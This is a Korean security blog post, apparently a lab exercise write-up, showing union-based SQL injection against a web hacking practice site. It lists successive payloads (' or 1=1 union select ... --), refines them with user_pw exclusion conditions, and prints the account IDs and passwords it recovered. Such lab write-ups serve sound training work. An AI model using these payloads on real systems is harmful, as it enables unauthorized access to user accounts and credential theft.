Notice
Recent Posts
Recent Comments
Link
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | |
| 7 | 8 | 9 | 10 | 11 | 12 | 13 |
| 14 | 15 | 16 | 17 | 18 | 19 | 20 |
| 21 | 22 | 23 | 24 | 25 | 26 | 27 |
| 28 | 29 | 30 | 31 |
Tags
- NETSEC
- Web
- sql injection
- AWS
- ncloud
- DHCP
- Router Firewall
- XSS
- stored procedure
- Mass SQL Injection
- UTM
- arp
- wireshark
- Web Authentication
- Vlan
- Linux
- snmp
- Websec
- Blind SQL Injection
- HSRP
- Database Scheme
- VPN
- VPC
- csrf
- docker
- RDS
- IDS
- WAF
- SQL
- 보안 솔루션
Archives
- Today
- Total
yuil :: SecOps
[WebSec] SQL Injection Lab 02 본문
웹 사이트 이용자의 id를 모르는 상태에서 union을 이용한 sql injection 공격으로 계정 정보(id, password 등) 3개를 알아내시오. 대상은 web hacking practice site
[hint] 해당 사이트는 사용자 정보가 들어있는 table의 주요 정보가 일부 노출되어 있다.
xp
' or 1=1 union select 1,1,1,1,1--


' or 1=1 union select '1',1,1,1,1--

' or 1=1 union select '1','1',1,1,1--

' or 1=1 union select '1','1','1',1,1--

' or 1=1 union select '1','1','1','1',1--

'

위에서 탈취한 문자열중 'nuno', 'dlaudtn' 가 id 또는 pw로 유력하고
'user_pw' 필드가 존재하는것을 확인했다.
id : nuno / pw : dlaudtn 대입

'dlaudtn'가 user_pw 필드의 데이터이다.
첫번째 필드가 id 필드고
두번째 필드가 pw 필드다.
다른 계정 찾기
user_pw 필드의 데이터가 'dlaudtn'가 아닌 조건으로 찾는다.
' or 1=1 and user_pw!='dlaudtn' union select 1,1,1,1,1--

' or 1=1 and user_pw!='dlaudtn' union select '1',1,1,1,1--

' or 1=1 and user_pw!='dlaudtn' union select '1','1',1,1,1--

' or 1=1 and user_pw!='dlaudtn' union select '1','1','1',1,1--

' or 1=1 and user_pw!='dlaudtn' union select '1','1','1','1',1--

id : kth1234 / pw : rlaxogml 확인
# 같은 방식으로 찾기 반복
' or 1=1 and user_pw!='dlaudtn' and user_pw!='rlaxogml' union select 1,1,1,1,1--
반응형
'실습 > Web Security 실습' 카테고리의 다른 글
| [WebSec] Database Scheme (0) | 2025.10.21 |
|---|---|
| [WebSec] Database Scheme 실습 - DB (0) | 2025.10.21 |
| [WebSec] SQL Injection 실습 - UNION (0) | 2025.10.21 |
| [WebSec] SQL Injection 실습 - 변환 에러 (0) | 2025.10.21 |
| [WebSec] SQL Injection 실습 - 인증우회 (0) | 2025.10.21 |
